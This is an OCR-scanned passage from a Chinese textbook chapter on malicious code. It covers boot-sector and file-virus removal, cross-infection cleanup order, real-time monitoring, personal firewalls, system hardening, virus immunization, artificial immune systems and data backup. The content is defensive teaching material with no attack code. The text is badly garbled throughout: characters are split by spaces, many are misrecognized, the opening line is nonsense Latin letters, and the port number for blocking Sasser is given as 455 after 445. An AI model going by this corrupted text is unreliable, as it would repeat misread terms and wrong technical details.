意 代码 ， Nahet epipotortbot bth elatg 由 于 清除 方法 不 正确 ,在 对 染 毒 

文件 进行 清除 时 ,有 可 能 将 文件 破坏 。 有 些 时 候 , 只 有 做 低级 格式 化 才能 彻底 清除 恶意 代 

码 ,但 却 会 丢失 大 量 文件 和 数据 。 不 论 采 用 手工 还 是 使 用 专业 杀毒 软件 清除 恶意 代码 ,都 是 
危险 的 ,有 了 时 可 能 出 现 “ 不 治 病 ” 反 而 “ 赔 命 ”的 后 果 , 将 有 用 的 文件 彻底 破坏 了 。 

根据 恶意 代码 编制 原理 的 不 同 ,恶意 代码 清除 的 原理 也 是 不 同 的 ,大 概 可 以 分 为 引导 区 
病毒 文件 型 病毒 .蠕虫 和 木马 等 的 清除 原理 。 本 节 主 要 以 引导 型 病毒 .文件 型 病毒 为 例 介 
绍 恶意 代码 清除 原理 。 

1. 引导 型 病毒 的 清除 原理 

引导 型 病毒 是 一 种 只 能 在 DOS 系统 发 挥 作用 的 陈旧 恶意 代码 。 引 导 区 病毒 感染 时 的 
攻击 部 位 和 破坏 行为 包括 以 下 几 方 面 。 

(1) 硬盘 主 引导 局 区 。 

(2) 硬盘 或 软盘 的 BOOT 扇 区 。 

(3) 为 保存 原 主 引导 忆 区 .BOOT 谭 区 ,病毒 可 能 随意 地 将 它们 写 人 其 他 书 区 ,而 毁坏 

(4) 引导 型 病毒 发 作 时 ,执行 破坏 行为 造成 种 种 损坏 。 

根据 引导 区 病毒 感染 和 破坏 部 位 的 不 同 , 可 以 分 以 下 几 种 方法 进行 修复 。 

第 一 种 : 便 盘 主 引 导 忆 区 染 毒 。 

便 盘 引导 区 染 毒 是 可 以 修复 的 ,修复 步骤 为 : 山 用 干净 的 软盘 司 动 系统 ; 书 寻 找 一 台 
同类 型 .硬盘 分 区 相同 的 无 毒 计算 机 ,将 其 硬盘 主 引 导 肩 区 写 人 一 张 软 盘 中 ; 包 将 此 软盘 搬 
入 被 感染 计算 机 ,将 其 中 采集 的 主 引 导 届 区 数据 写 入 染 毒 便 盘 , 即 可 修复 。 

第 二 种 : 人 硬盘、 软盘 BOOT 扇 区 染 毒 。 

这 种 情况 也 是 可 以 修复 的 。 修 复方 法 是 寻找 与 染 毒 盘 相同 版 本 的 干净 系统 软盘 ,执行 
SYS 命令 。 


第 10 章 恶意 代码 防范 技术 265 


第 三 种 : 目录 区 修复 。 

如 果 引 导 区 病毒 将 原 主 引导 扇 区 或 BOOT 扇 区 覆盖 式 写 人 根 目 录 区 ,被 覆盖 的 根 目录 
区 完全 损坏 ,不 可 能 修复 。 如 果 仅 仅 履 盖 式 写 和 第 一 FAT 表 时 ,第 二 FAT 表 未 被 破坏 , 则 
可 以 修复 。 修 复方 法 是 将 第 二 FAT 表 复 制 到 第 一 FAT 表 中 。 

第 四 种 : 占用 空间 的 回收 。 

引导 型 病毒 占用 的 其 他 部 分 磁盘 空间 ,一 般 都 标示 为 “ 坏 复 ?或 文件 结束 簇 ”。 系 统 不 
能 再 使 用 标示 后 的 磁盘 空间 ,当然 ,这 些 被 标示 的 空间 也 是 可 以 收回 的 。 

2. 文件 型 病毒 的 清除 原理 

在 文件 型 病毒 中 , 禾 盖 型 病毒 是 最 恶劣 的 。 履 盖 型 文件 病毒 硬性 覆盖 了 一 部 分 宿主 程序 ， 
使 宿主 程序 的 部 分 信息 丢失 ,即使 把 病毒 杀 掉 ,程序 也 已 经 不 能 修复 了 。 对 覆盖 型 病毒 感染 的 
文件 只 能 将 其 彻底 删除 ,没有 挽救 原文 件 的 余地 。 如 果 没 有 备份 ,将 造成 很 大 的 损失 。 

除了 覆盖 型 病毒 之 外 ,其 他 感染 COM 和 EXE 的 文件 型 病毒 都 可 以 被 清除 干净 。 因 为 
病毒 在 感染 原文 件 时 没有 丢弃 原始 信息 ,既然 病毒 能 在 内 存 中 恢复 被 感染 文件 的 代码 并 了 予 
以 执行 , 则 可 以 按照 病毒 传染 的 逆 过 程 将 病毒 清除 干净 ,并 恢复 到 其 原来 的 功能 。 

如 果 染 毒 的 文件 有 备份 的 话 ,把 备份 的 文件 复制 一 下 也 可 以 简单 地 恢复 原文 件 , 就 不 需要 
专门 去 清除 了 。 执 行文 件 若 加 上 上 自修 复 功 能 的 话 , 遇 到 病毒 的 时 候 , 程 序 可 以 自行 复原 ; 如 果 
文件 没有 加 上 任何 防护 的 话 , 就 只 能 够 徘 杀 毒 软件 来 清除 ,但 是 ,用 杀毒 软件 来 清除 病毒 也 不 
能 保证 完全 复原 原 有 的 程序 功能 ,甚至 有 可 能 出 现 越 清除 越 糟 糕 ,以 至 于 造成 在 清除 病毒 之 后 
文件 反而 不 能 执行 的 局 面 。 因 此 ,用 户 必 须 靠 自己 平日 备份 自己 的 资料 来 确保 万 无 一 失 。 

由 于 某 些 病毒 会 破坏 系统 数据 ,如 破坏 目录 结构 和 FAT, 因 此 在 清除 完 病 毒 之 后 ,还 要 
进行 系统 维护 工作 。 可 见 ,病毒 的 清除 工作 与 系统 的 维护 工作 往往 是 分 不 开 的 。 

3. 清除 交叉 感染 病毒 

有 时 一 台 计 算 机 内 同时 潜伏 着 几 种 病毒 , 当 一 个 健康 程序 在 这 个 计算 机 上 运行 时 ,会 感 
染 多 种 病毒 ,引起 交叉 感染 。 

多 种 病毒 在 一 个 宿主 程序 中 形成 交叉 感染 后 ,如 果 在 这 种 情况 下 杀毒 ,一定 要 格外 小 
心 ,必须 分 清 病毒 感染 的 先后 顺序 , 先 清除 感染 的 病毒 ,否则 会 把 程序 "“ 杀 死 ”。 虽 然 病 毒 被 
杀 死 了 ,但 程序 也 不 能 使 用 了 。 

一 个 交叉 感染 多 个 病毒 的 结构 示意 图 如 图 10-1 所 示 。 从 图 10-1 中 可 以 看 出 ,病毒 的 
感染 顺序 是 : 病毒 1 一 病毒 2 一 病毒 3 。 

当 运 行 被 感染 的 宿主 程序 时 ,病毒 夺取 计算 机 的 控制 权 , 先 运行 病毒 程序 ,顺序 是 : 病 


毒 3 一 病毒 2 一 病毒 1 。 


和 
窑 主 文人 


头 部 
宿主 文件 


10-1 病毒 交叉 感染 结构 示意 图 
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在 杀毒 时 ,应 先 清 除 病毒 3; 然后 清除 病毒 2; 最 后 清除 病毒 1 ,层次 分 明 ,不 能 混乱 , 否 
则 会 破坏 答 主 程序 。 


10.5.2 恶意 代码 的 清除 方法 


恶意 代码 的 清除 可 分 为 手工 清除 和 自动 清除 两 种 方法 。 

手工 清除 恶意 代码 的 方法 使 用 Debug、Regedit、SoftICE 和 反 汇 编 语言 等 简单 工具 , 借 
助 于 对 某 种 恶意 代码 的 具体 认识 ,从 感染 恶意 代码 的 文件 中 ,摘除 恶意 代码 ,使 之 复原 。 手 
工 操 作 复 杂 、 速 度 慢 、 风 险 大 ,需要 熟练 的 技能 和 丰富 的 知识 。 

自动 清除 方法 是 使 用 查 杀 软件 进行 自动 清除 恶意 代码 并 使 其 复原 的 方法 。 自 动 清除 方 
法 的 操作 简单 .效率 高 .风险 小 。 当 遇 到 被 感染 的 文件 急需 恢复 而 又 找 不 到 查 杀 软件 或 软件 
无 效 时 , 才 会 使 用 手工 修复 的 方法 。 从 与 恶意 代码 对 抗 的 全 局 情况 来 看 ,人 们 总 是 从 手工 清 
除开 始 ,获取 一 定 经 验 后 再 研制 成 相应 的 软件 产品 ,使 计算 机 自动 地 完成 全 部 清除 操作 。 

手工 修复 很 麻烦 ,而 且 容 易 出 错 , 还 要 求 对 恶意 代码 的 原理 很 熟悉 。 用 查 杀 软件 进行 自 
动 清除 则 比较 省 事 ,一 般 按 照 菜 单 提示 和 联机 帮助 就 可 以 工作 了 。 自 动 清除 的 方法 基本 上 
是 将 手工 操作 加 以 编码 并 用 程序 实现 ,其 工作 原理 是 一 样 的 。 为 了 使 用 方便 , 查 杀 软件 需要 
附加 许多 功能 ,包括 用 户 界面 .错误 和 例外 情况 检测 和 处 理 、 磁 盘 目录 搜索 .联机 帮助 .内 存 
的 检测 与 清除 、 报 告 生成 .对 网 络 驱 动 器 的 支持 、 软 件 自 身 完整 性 ( 防 恶 意 代码 和 防 算 改 ) 的 
保护 措施 及 对 多 种 恶意 代码 的 检测 和 清除 能 力 等 。 

如 果 自 动 方法 和 手工 方法 仍 不 奏效 , 那 就 只 能 对 磁盘 进行 低级 格式 化 了 。 经 过 格式 化 ， 
虽然 可 以 清除 所 有 恶意 代码 ,但 却 以 磁盘 上 所 有 文件 的 丢失 作为 代价 。 


10.6 恶意 代码 的 预防 


恶意 代码 的 预防 技术 是 指 通过 一 定 的 技术 手段 防止 恶意 代码 对 计算 机 系统 进行 传染 和 
破坏 。 实 际 上 它 是 一 种 预先 的 特征 判定 技术 。 具 体 来 说 ,恶意 代码 的 预防 是 通过 阻止 恶意 
代码 进入 系统 或 阻止 恶意 代码 对 磁盘 的 操作 尤其 是 写 操作 ,以 达到 保护 系统 的 目的 。 亚 意 
代码 的 预防 技术 主要 包括 磁盘 引导 区 保护 .加 密 可 执行 程序 . 读 写 控制 技术 .系统 监控 技术 、 
个 人 防火 墙 技术 、 系 统 加 固 等 。 在 蠕虫 泛滥 的 今天 ,系统 加 固 方法 的 地 位 越 来 越 重要 ,人 处 于 
不 可 替代 的 地 位 。 


10.6.1 系统 监控 技术 


系统 监控 技术 (实时 监控 技术 ) 已 经 形成 了 包括 注册 表 监 控 .脚本 监控 内存 监 控 、 邮 件 
监控 文件 监控 在 内 的 多 种 监控 技术 。 它 们 协同 工作 形成 的 防护 体系 ,使 计算 机 预防 恶意 代 
码 的 能 力 大 大 增强 。 据 统计 ,计算 机 只 要 运行 实时 监控 系统 并 进行 及 时 升级 ,基本 上 能 预防 
80% 的 恶意 代码 ,这 一 完整 的 防护 体系 已 经 被 所 有 的 安全 公司 认可 。 当 前 ,几乎 每 个 恶意 代 
码 防范 产品 都 提供 了 这 些 监控 手段 。 

实时 监控 概念 最 根本 的 优点 是 解决 了 用 户 对 恶意 代码 的 “未 知性 ”, 或 者 说 是 “不 确定 
性 问题。 用户 的 "未知 性? 其实 是 计算 机 反 恶 意 代 码 技术 发 展 至 今 一 直 没 有 得 到 很 好 解决 
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的 问题 之 一 。 值 得 一 提 的 是 ,到 现在 还 总 是 会 听 到 有 人 说 :“ 有 病毒 ? 用 杀毒 软件 杀 就 行 
了 。 "问题 出 在 这 个 有”? 字 上 ,用 户 判断 有 无 恶意 代码 的 标准 是 什么 ? 实际 上 等 到 用 户 感 觉 
到 系统 中 确实 有 恶意 代码 在 作怪 的 时 候 , 系 统 可 能 已 到 了 骨 浊 的 边缘 。 

实时 监控 是 先前 性 的 ,而 不 是 浏 后 性 的 。 任 何 程序 在 调用 之 前 都 必须 先 过 滤 一 过 。 一 
旦 有 恶意 代码 侵入 , 它 就 报 屠 ,并 上 自动 查 杀 ,将 恶意 代码 拒 之 门 外 , 做 到 防 患 于 未 然 。 这 和 等 
恶意 代码 侵入 后 甚至 遭 到 破坏 后 再 去 杀毒 是 不 一 样 的 ,其 安全 性 更 高 。 互 联网 是 大 趋势 , 它 
本 号 就 是 实时 的 、 动 态 的 ,网 络 已 经 成 为 恶意 代码 传播 的 最 佳 途径 ,迫切 需要 具有 实时 性 的 
反 恶 意 代 码 软件 。 

实时 监控 技术 能 够 始终 作用 于 计算 机 系统 之 中 ,监控 访问 系统 资源 的 一 切 操作 ,并 能 够 
对 其 中 可 能 含有 的 恶意 代码 进行 清除 ,这 也 与 "及早 发 现 ` 及 早 根治 ?的 医学 上 早期 治疗 方针 
不 评 而 合 。 


10.6.2 个 人 防火 墙 技 术 


个 人 防火 墙 以 软件 形式 安装 在 最 终 用 户 计 算 机 上 ,阻止 由 外 到 内 和 由 内 到 外 的 威胁 。 
个 人 防火 墙 不 仅 可 以 监测 和 控制 网 络 级 数据 流 , 而 且 可 以 监测 和 控制 应 用 级 数据 流 , 弥 补 边 
际 防 火 墙 和 防 病毒 软件 等 传统 防御 手段 的 不 足 。 个 人 防火 墙 和 边际 防火 墙 的 区 别 是 ,前 者 
可 以 监测 和 控制 应 用 级 数据 流 。 如 果 一 个 本 不 应 该 对 外 联网 的 应 用 程序 对 外 发 起 了 网 络 连 
接 , 个 人 防火 墙 就 会 将 这 个 行为 报告 给 用 户 ,这 可 以 预防 木马 后门 等 恶意 代码 的 攻击 。 

个 人 防火 墙 的 作用 是 阻 断 这 些 不 安全 的 网 络 行为 。 它 对 计算 机 发 往外 界 的 数据 包 和 外 
界 发 送 到 计算 机 的 数据 包 进 行 分 析 和 过 滤 ,把 不 正常 的 .恶意 的 和 具备 攻击 性 的 数据 包 拦截 
下 来 ,并且 向 用 户 发 出 提醒 。 

如 果 把 杀毒 软件 比 作 铠甲 和 防弹 衣 ,那么 个 人 防火 墙 可 以 比 作 是 护城河 或 是 屏蔽 网 , 隔 
断 内 外 的 通信 和 往来 ,使 得 外 界 无 法 进入 内 网 ,也 侦查 不 到 内 部 的 情况 ,而 内 部 人 员 也 无 法 
越过 这 层 保护 把 信息 送 达 出 去 。 除 了 阻 断 非 法 对 外 发 送 密码 等 私密 信息 、 阻 挡 外 界 的 控制 
外 ,个 人 防火 墙 的 作用 还 在 于 屏蔽 来 自 外 界 的 攻击 ,如 探测 本 地 的 信息 和 一 些 频繁 的 流入 数 
据 包 。 

此 外 ,个 人 防火 墙 的 最 大 特点 是 采用 以 应 用 程序 为 中 心 的 方式 控制 数据 流 ,根据 应 用 程 
序 开放 和 关闭 端口 。 例 如 ,Sasser 蠕虫 试图 通过 445 端口 连接 到 PC, 而 个 人 防火 墙 能 够 通 
过 关闭 455 端口 防止 PC 感染 Sasser 蠕虫 。 个 人 防火 墙 通 过 监测 应 用 程序 问 操 作 系 统 发 
出 的 通信 请 求 ,来 进行 应 用 程序 级 的 访问 控制 。 首 先 , 个 人 防火 墙 将 每 个 应 用 程序 与 它 
发 出 的 网 络 连 接 请 求 建立 关系 。 然 后 ,个 人 防火 墙根 据 用 户 定 义 的 规则 ,决定 允许 或 是 
拒绝 该 应 用 程 学 的 网 络 连接 请 求 。 这 样 可 以 防止 未 经 许可 的 应 用 程序 建立 与 Internet 的 
非法 连接 。 个 人 防火 墙 可 以 有 效 阻 止 蠕 虫 、 木 马 和 间谍 软件 的 非法 数据 连接 ,进而 对 它 
们 有 效 防 范 。 


10.6.3 系统 加 固 技术 


系统 加 固 是 防 黑客 领域 的 基本 问题 ,主要 是 通过 配置 系统 的 参数 (如 服务 .端口 .协议 
等 ) 或 给 系统 打 补 丁 来 减少 系统 被 人 侵 的 可 能 性 。 第 见 的 系统 加 固 工作 主要 包括 安装 最 新 
补丁 、 禁 止 不 必要 的 应 用 和 服务 、 禁 止 不 必要 的 账号 、 去 际 后 门 、 内 核 参数 及 配置 调整 系统 


268 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


最 小 化 处 理 、 加 强 口令 管理 ,局 动 日 志 审 计 功 能 等 。 

在 防范 恶意 代码 领域 ,系统 补丁 的 管理 已 经 成 了 商业 软件 的 必 选 功能 。 例 如 ,360 安全 
卫士 就 以 补丁 管理 着 称 。 一 般 来 说 ,和 计算 机 相关 的 补丁 不 外 乎 系统 安全 补丁 、 程 序 bug 
补丁 、 身 文 汉化 补丁 \、 人 刹 件 支持 补丁 和 游戏 补丁 这 5 类。 其 中 ,系统 安全 补丁 是 最 重要 的 。 

所 谓 系统 安全 补丁 ,主要 是 针对 操作 系统 来 量 员 定制 的 。 就 最 常用 的 Windows 操作 系 
统 而 言 , 由 于 开发 工作 复杂 代码 量 巨 大 ,蓝屏 死机 或 者 是 非法 错误 部 是 家 常 便 饭 了 。 而 且 
在 网 络 时 代 , 有 人 会 利用 系统 的 漏洞 侵入 用 户 的 计算 机 并 盗 取 重 要 文件 。 因 此 微软 公司 不 
断 推 出 各 种 系统 安全 补丁 , 则 在 增强 系统 安全 性 和 稳定 性 。 


10.7 恶意 代码 的 侈 疫 


给 生物 有 机 体 注 射 疫苗 ,可 以 提高 其 对 生物 病毒 的 抵抗 能 力 。 同 样 ,采用 给 计算 机 注射 
恶意 代码 疫苗 的 方法 ,可 以 预防 计算 机 系统 的 恶意 代码 。 

亚 意 代码 的 免疫 技术 出 现 非常 早 , 但 是 没有 很 大 发 展 。 针 对 某 一 种 恶意 代码 的 免疫 方 
法 已 经 没有 人 再 用 了 ,目前 尚 没有 出 现 通用 的 能 对 各 种 恶意 代码 都 有 人 免疫 作用 的 技术 。 从 
某 种 程度 上 来 说 ,也 许 根 本 就 不 存在 这 样 一 种 技术 。 根 据 免 疫 的 性 质 ,可 以 把 它 归 为 预防 技 
本 。 从 本 质 上 讲 , 对 计算 机 系统 而 言 ,计算 机 预防 技术 是 被 动 预防 技术 ,利用 外 围 的 技术 提 
高 计算 机 系统 的 防范 能 力 ; 计算 机 免疫 技术 是 主动 的 预防 技术 ,通过 计算 机 系统 本 身 的 技 
术 提 高 自己 的 防范 能 力 。 


10.7.1 传统 恶意 代码 免疫 方法 


恶意 代码 的 传染 模块 一 般 包括 传染 条 件 判断 和 实施 传染 两 部 分 。 在 恶意 代码 被 激活 的 
状态 下 ,恶意 代码 程序 通过 判断 传染 条 件 的 满足 与 否 来 决定 是 否 对 目标 对 象 进 行 传染 。 一 
般 情 况 下 ,恶意 代码 程序 为 了 防止 重复 感染 同一 个 对 象 ,都 要 给 被 传染 对 象 加 上 传染 标识 。 
检测 被 攻击 对 象 是 否 存在 这 种 标识 是 传染 条 件 判 断 的 重要 环节 。 若 存在 这 种 标识 , 则 恶意 
代码 程序 不 对 该 对 象 进 行 传染 ; 若 不 存在 这 种 标识 , 则 恶意 代码 程序 就 对 该 对 象 实 施 传 染 。 
基于 这 种 原理 ,自然 会 想到 ,如 果 在 正常 对 象 中 加 上 这 种 标识 ,就 可 以 不 受 恶 意 代码 的 传染 ， 
以 达到 免疫 的 效果 。 

从 实现 恶意 代码 免疫 的 角度 看 ,可 以 将 恶意 代码 的 传染 分 为 两 种 。 一 种 是 在 传染 前 先 
检查 待 传染 对 象 是 否 已 经 被 自身 传染 过 ,如 果 没 有 则 进行 传染 ; 如 果 传 染 了 则 不 再 重复 进 
行 传 染 。 这 种 用 作 判 断 是 否 被 恶意 代码 和 月 身 传染 的 特殊 标志 被 称 为 传染 标识 。 第 二 种 是 在 
传染 时 不 判断 是 否 存在 免疫 标识 ,恶意 代码 只 要 找到 一 个 可 传染 对 象 就 进行 一 次 传染 。 就 
像 黑色 星期 五 那样 ,一 个 文件 可 能 被 黑色 星期 五 反复 传染 多 次 ,滚雪球 一 样 越 滚 越 大 。 在 过 
去 ,对 于 前 一 种 恶意 代码 容易 进行 免疫 ,而 对 后 一 种 恶意 代码 的 免疫 非常 难 实现 。 

传统 的 安全 软件 使 用 过 的 免疫 方法 有 以 下 两 种 。 

1. 基于 感染 标识 的 免疫 方法 

在 成 功 感染 后 ,小 球 病毒 会 在 DOS 引导 扇 区 的 1FCH 处 填 上 1357H。 因 此 , 当 小 球 病 
毒 在 引导 区 里 检查 到 这 个 标志 就 认为 已 经 成 功 感染 过 ,就 不 再 对 它 进 行 传染 了 。1575 文件 
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型 病毒 的 特殊 标志 是 文件 尾部 的 内 容 为 0CH 和 0AH 的 两 个 字 节 。 这 种 免疫 方法 的 优点 
是 可 以 有 效 地 防止 某 一 种 特定 恶意 代码 的 传染 。 但 缺点 也 很 严重 ,因此 ,当前 使 用 这 种 免疫 
方法 的 商品 化 安全 防范 软件 已 经 不 存在 了 。 

在 恶意 代码 防范 的 初期 ,由 于 恶意 代码 的 数量 非常 少 , 该 免疫 方法 曾经 很 流行 。 但 是 该 
方法 存在 的 缺点 也 相当 明显 ,有 以 下 几 方 面 。 

(1) 对 于 不 设 有 感染 标识 的 恶意 代码 不 能 达到 免疫 的 目的 。 

(2) 当 亚 意 代 码 变 种 时 ， 不 青 使 用 原 免疫 标志 ,该 方法 就 失效 了 。 

(3) 某 些 恶意 代码 的 免疫 标志 不 容易 仿制 . 需要 对 原文 件 要 做 大 的 改动 才能 加 上 这 种 
标志 。 

(4) 由 于 恶意 代码 的 种 类 较 多 ,如 果 一 个 对 象 加 上 所 有 恶意 代码 的 免疫 标识 , 则 会 导致 
其 体积 大 增 。 

(5) 这 种 方法 能 阻止 传染 , 却 不 能 阻止 其 他 行为 。 

2. 基于 完整 性 检查 的 免疫 方法 


基于 完整 性 检查 的 免疫 方法 只 能 用 于 文件 而 不 能 用 于 引导 扇 区 。 这 种 方法 的 原理 是 : 
为 可 执行 程序 增加 一 个 免疫 外 过 ,同时 在 免疫 外 壳 中 记录 有 关 用 于 完整 性 检查 的 信息 。 执 
行 具 有 这 种 免疫 功能 的 程序 时 ,免疫 外 壳 首 先 运 行 , 检 查 自 身 的 程序 校 验 和 , 若 未 发 现 异 常 ， 
则 转 去 执行 受 保护 的 程序 。 

不 论 什 么 原因 使 这 些 程序 改变 或 破坏 ,免疫 外 壳 都 可 以 检查 出 来 ,并 发 出 警告 ,用 户 可 
选择 进行 和 月 毁 .重新 引导 启动 计算 机 或 继续 等 操作 。 这 种 免疫 方法 可 以 看 作 是 一 种 通用 的 
自我 完整 性 检验 方法 。 这 种 方法 不 只 是 针对 恶意 代码 的 ,对 于 其 他 原因 造成 的 文件 变化 , 免 
疫 外 充 程 序 也 都 能 检查 出 来 并 报告。 

但 同样 ,该 方法 存在 以 下 一 些 不 足 。 

(1) 每 个 受到 保护 的 文件 都 要 需要 额外 的 存储 空间 。 

(2) 现在 常用 的 一 些 校 验 码 算法 仍 不 能 满足 防 恶意 代码 的 需要 。 

(3) 无 法 对 付 覆 盖 型 的 文件 型 恶意 代码 。 

(4) 有 些 类 型 的 文件 不 能 使 用 外 加 免疫 外 这 的 防护 方法 。 

(5) 一 旦 恶意 代码 被 免疫 外 壳 包 在 里 面 时 , 它 就 成 了 被 保护 的 恶意 代码 。 


10.7.2 人工 免 疫 系统 


1986 年 ,美国 Los Alamos 国家 实验 室 的 J. Doyne Farmer、Norman H. Packard 和 Alan 
S. Perelson 三 人 率先 提出 了 人 工 免 疫 的 概念 。 人 工 免 疫 系 统 是 受 生 物 免 疫 系 统 (Biological 
Immune System,BIS) 局 发 而 产生 的 智能 计算 方法 ,通过 模拟 免疫 系统 的 功能 .原理 和 模型 
来 解决 复杂 的 实际 问题 ,具有 自 组 织 . 自 适应 .记忆 和 分 布 式 等 优势 ,目前 已 在 数据 挖掘 、 模 
式 识 别 、 机 天 学 习 、 信 息 安 全 等 多 个 领域 广泛 应 用 。 早 在 2002 年 ,Paul K. Harmer 等 人 就 提 
出 了 一 个 人 工 免 疫 原 理 在 计算 机 安全 领域 的 应 用 框架 ,指出 了 人 工 免 疫 原 理 在 恶意 代码 检 
测 、 入 侵 检 测 等 领域 的 应 用 。 

第 一 代 AIS 基于 传统 免疫 系统 的 自体 / 非 自 体 (Self/Non-self, SNS) 理 论 ,其 核心 思 
是 机 体 对 自体 (Self) 和 非 自 体 (Non-self) 的 区 分 。 

1994 年 ,美国 学 者 Stephanie Forrest 等 人 根据 自体 / 非 自 体 理 论 , 提 出 了 否定 选择 算法 
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(Negative Selection Algorithm,NSA) 来 识别 目 体 。 该 算法 模拟 了 机 体 免 疫 细胞 成 熟 的 过 
程 ,算法 包括 两 个 阶段 :自体 耐 受 阶 段 和 识别 阶段 。 在 日 体 耐 受 阶 段 ,首先 随机 生成 大 量 候 
选 检测 天 ,然后 ,候选 检测 需 经 过 上 自体 耐 受 过 程 去 除 匹配 目 体 的 检测 需 , 最 终 成 为 成 熟 检测 
天 ;在 识别 阶段 采用 成 熟 检测 硕 检 测 未 知 抗原 。 人 否定 选择 算法 首先 应 用 于 UNIX 系统 的 异 
妾 进 程 检测 。2000 年 ,巴西 学 者 Castro 等 人 首次 将 生物 学 的 克隆 选择 理论 引入 工程 计算 领 
域 ,提出 了 克隆 选择 算法 (Clonal Selection Algorithm,CSA) ,后 命名 为 CLONALG。 该 算 
法 可 用 于 解决 模式 识别 ,多 峰 优化 和 组 合 优化 等 工程 问题 。 

第 二 代 AIS 基于 危险 理论 (Danger Theory)。1994 年 ,免疫 学 专家 Polly Matzinger 博 
土 提出 了 和 危险 理论 。 她 认为 危险 信号 才 是 引发 机 体 免 疫 啊 应 的 关键 ,机 体 的 免疫 系统 通过 
识别 危险 信号 来 产生 相应 的 保护 机 制 , 而 不 是 SNS 理论 中 认为 的 非 自 体 的 异 已 性 。 人 危险 信 
号 的 产生 与 检测 是 危险 理论 的 核心 。 她 指出 , 仅 赁 Non-self 并 不 能 引发 免疫 反应 ,机 体 要 
防范 的 是 危险 ,而 不 是 Non-self。 人 危险 理论 的 提出 不 仅 引 发 了 免疫 学 界 的 革命 ,也 一 并 解决 
了 SNS 理论 存在 的 Self 集 动态 更 新 和 Self 集 过 于 庞大 的 问题 。 

2002 年 ,英国 诺丁汉 大 学 的 Uwe Aickelin 博士 首次 将 危险 理论 引入 人 工 免 疫 系统 中 ， 
分 析 了 将 危险 理论 应 用 于 网 络 入 侵 检 测 的 可 行 性 。Julie Greensmith 等 人 在 2005 年 模仿 树 
突 细胞 工作 机 制 ,提出 并 实现 了 基于 危险 理论 的 树 突 细胞 算法 (Dendritic Cell Algorithm,， 
DCA) ,并 成 功 地 应 用 到 了 异常 检测 .SYN 端口 扫描 检测 及 垃圾 信息 过 滤 等 问题 中 。 

恶意 代码 防范 或 预防 的 目的 就 在 于 保障 系统 /应 用 的 功能 和 性 能 ,与 生物 机 体 的 免疫 在 
目标 上 有 一 臻 性。 尤其 是 生物 免疫 学 危险 理论 核心 思想 与 恶意 代码 防范 的 思想 不 谋 而 
合 一 一 危险 信号 /安全 威胁 的 检测 是 核心 。 在 恶意 代码 防范 中 ,如 何 对 安全 威胁 的 类 型 级 
别 进行 定义 和 识别 是 技术 关键 。 

目前 基于 人 工人 免疫 系统 的 恶意 代码 检测 技术 已 有 一 些 人 研究 成 果 。Dhaeseleer P. 等 人 和 采 
用 否定 选择 算法 来 检测 被 保护 数据 和 程序 文件 的 变化 ,该 方法 可 以 检测 未 知 病毒 ,但 只 能 针 
对 静态 数据 和 软件 进行 检测 。Lee 等 则 基于 SNS 理论 ,从 程序 入 口 点 开始 提取 一 系列 字符 
串 来 区 分 自体 与 非 有 自体 ,以 实现 恶意 代码 的 检测 。James Brown 等 提出 了 基于 否定 选择 算 
法 的 移动 恶意 代码 检测 希 mAIS。mAIS 采 用 善意 移动 应 用 检测 集 和 恶意 移动 应 用 两 套 检 
测 集 ,利用 分 裂 检测 器 法 (Split Detector Method,SDM) 来 识别 Android 应 用 中 的 信息 流 ， 
从 而 判定 恶意 Android 应 用 ,识别 率 高 达 93. 33%。 芦 天亮 等 人 针对 移动 恶意 代码 的 检测 
问题 ,提出 使 用 否定 选择 算法 生成 检测 带 ,利用 克隆 选择 算法 提高 抗原 亲和力 ,该 方法 还 可 
以 识别 出 经 过 加 密 和 代码 混 消 后 的 恶意 代码 。 

遗憾 的 是 ,目前 大 部 分 基于 人 工 免疫 的 恶意 代码 研究 还 集中 于 检测 模型 ,还 没有 很 好 的 
基于 人 工人 免疫 的 恶意 代码 清除 方案 ,并 没有 形成 完整 的 恶意 代码 免疫 方案 。 硕 望 随 着 人 工 
和 贸 能 技术 的 发 展 ,基于 人 工人 免疫 系统 的 恶意 代码 防范 会 有 更 多 的 成 果 。 


10.8 数据 备份 与 数据 恢复 的 意义 


数据 丢失 看 上 去 并 不 像 一 种 真正 的 安全 威胁 ,但 它 确实 是 非常 严重 的 安全 问题 。 如 果 
用 户 丢 失 了 数据 ,是 因为 茶水 倒 在 了 笔记 本 上 导致 的 ,还 是 由 于 恶意 代码 的 攻击 导致 的 ,这 
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两 者 存在 根本 的 区 别 吗 ? 从 数据 已 经 丢失 这 个 事实 来 看 ,两 者 都 是 安全 威胁 。 

2001 年 9 月 11 日 ,美国 世贸 中 心 大 楼 发 生 爆 炸 。 一 年 后 ,原本 设立 在 该 楼 的 350 家 公 
司 能 够 继续 营业 的 只 有 150 家 ,其 他 很 多 企业 由 于 无 法 恢复 业务 相关 的 重要 数据 而 被 迫 倒 
闭 。 但 是 ,世贸 中 心 最 大 的 主 顾 之 一 摩根 士 丹 利 宣布 ,双子 楼 的 倒塌 并 没有 导致 关键 数据 的 
丢失 。 

这 主要 是 因为 ,摩根 士 丹 利 精心 构造 的 远程 防 灾 系 统 , 能 够 实时 将 重要 的 业务 信息 备份 
到 几 英 里 之 外 的 数据 中 心 。 大 楼 倒塌 之 后 ,该 数据 中 心 立 刻 发 挥 作用 ,保障 了 公司 业务 的 继 
续 运 行 ,有 效 降低 了 灾难 对 于 整个 企业 发 展 的 影响 。 摩 根 士 丹 利 在 第 二 天 就 进入 了 正常 的 
工作 状态 。 摩 根 士 丹 利 几 年 前 就 制定 的 数据 安全 战略 ,在 这 次 大 劫难 中 发 挥 了 令 人 瞩目 的 
作用 。 

据 统计 在 数据 丢失 事件 中 , 便 件 故障 是 导致 数据 丢失 的 最 主要 原因 , 占 全 部 丢失 事件 的 
42% ,其 中 包括 由 于 硬盘 驱动 器 的 故障 和 突然 断 电 带 来 的 数据 丢失 。 人 为 原因 占 了 全 部 数 
据 丢 失事 件 的 23% ,包括 数据 的 意外 删除 及 硬件 的 意外 损坏 (如 硬盘 跌落 导致 的 损失 )。 软 
件 原因 占 了 数据 丢失 事件 的 13% 。 盗 禄 占 了 全 部 数据 丢失 事件 的 5% 。 硬 件 的 毁坏 占 了 所 
有 数据 丢失 事件 的 3% ,包括 洪水 .雷击 和 停电 造成 的 毁坏 。 最 后 ,恶意 代码 攻击 占 了 全 部 
数据 丢失 事件 的 14% ,包括 各 种 类 型 的 恶意 代码 。 近 年 来 , 随 着 恶意 代码 的 进一步 恶化 ,其 
造成 的 数据 丢失 也 有 上 升 的 趋势 。 

